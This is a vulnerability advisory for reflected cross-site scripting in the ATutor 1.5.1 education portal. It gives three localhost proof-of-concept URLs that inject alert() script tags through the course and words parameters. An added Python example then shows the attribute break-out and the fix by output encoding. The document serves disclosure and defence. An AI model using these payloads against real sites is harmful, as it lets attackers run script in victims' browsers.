ATutor 1.5.1 and prior multiple XSS Vulnerabilities
SEVERITY:
=========
Medium
SOFTWARE:
=========
ATutor 1.5.1
http://www.atutor.ca/
INFO:
=====
ATutor 1.5.1 is a web-based education portal.
DESCRIPTION:
============
The application is vulnerable to reflected cross-site scripting (XSS) through several request parameters that are echoed back into the page unencoded:
--==XSS==--
Some examples:
http://localhost/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script>
http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages
http://localhost/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search
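All three examples share one pattern: a query parameter lands inside a double-quoted HTML attribute, so a value beginning with `">` closes the attribute and the tag and everything after it is parsed as markup. The following Python block is an added illustration of that pattern and of the fix (contextual output encoding); it is not ATutor code. The two render functions are hypothetical stand-ins for a form that reflects the `course` parameter, and SAMPLE_URL is a constructed request in the shape of the advisory's login.php example.

```python
"""Model of the reflected-XSS pattern in the advisory, beside its fix.

Added example, not ATutor code. `render_vulnerable` and `render_hardened`
are hypothetical stand-ins for a login form that echoes the `course` query
parameter into an HTML attribute; SAMPLE_URL is a constructed request.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request, modelled on the advisory's login.php example.
# (No ';' inside the value, so older parse_qs versions do not split on it.)
SAMPLE_URL = 'http://localhost/tour/login.php?course="><script>alert(1)</script>'


def course_from_url(url: str) -> str:
    """Extract the `course` query parameter as the server would receive it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("course", [""])[0]


def render_vulnerable(course: str) -> str:
    """Reflects the parameter into a double-quoted attribute with no encoding.

    A value starting with '">' terminates the attribute and the <input> tag,
    so the remainder of the input is rendered as live markup.
    """
    return '<input type="hidden" name="course" value="' + course + '">'


def render_hardened(course: str) -> str:
    """Same template, but the value is entity-encoded for attribute context.

    html.escape(quote=True) encodes & < > " and ', so neither a quote nor an
    angle bracket survives to break out of the attribute value.
    """
    return ('<input type="hidden" name="course" value="'
            + html.escape(course, quote=True) + '">')


# Matches a literal, un-encoded <script tag in rendered output.
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def has_injected_tag(rendered_html: str) -> bool:
    """Does a raw <script> tag appear in the rendered page? (True = injection survived.)"""
    return SCRIPT_TAG.search(rendered_html) is not None


if __name__ == "__main__":
    course = course_from_url(SAMPLE_URL)
    print("vulnerable:", render_vulnerable(course))
    print("hardened:  ", render_hardened(course))
    print("tag survives in vulnerable output:", has_injected_tag(render_vulnerable(course)))
    print("tag survives in hardened output:  ", has_injected_tag(render_hardened(course)))
```

The encoding must match the output context: for a double-quoted attribute, encoding `"`, `<`, `>` and `&` is what stops the break-out; input filtering for the string `<script>` alone is not an adequate substitute. In the PHP code base this corresponds to wrapping every reflected parameter in `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` at the point where it is written into the page.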
VENDOR STATUS:
==============
The vendor was contacted, but no response has been received to date.
CREDITS:
========
This vulnerability was discovered and researched by
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2094